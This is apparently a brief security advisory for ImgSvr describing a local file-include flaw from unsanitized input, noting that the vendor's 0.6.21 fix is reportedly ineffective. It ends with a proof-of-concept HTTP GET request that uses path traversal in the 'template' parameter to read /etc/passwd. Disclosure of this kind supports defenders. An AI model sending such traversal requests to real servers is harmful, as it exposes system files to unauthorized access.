source: https://www.securityfocus.com/bid/24853/info
ImgSvr is prone to a local file-include vulnerability because it fails to sanitize user-supplied input.
Attackers may exploit this issue to access files that may contain sensitive information.
UPDATE (December 24, 2007): According to the vendor, this issue was addressed in ImgSvr 0.6.21. However, reports indicate that this version is still vulnerable.
GET /?template=../../../../../../../../../../etc/passwd HTTP/1.0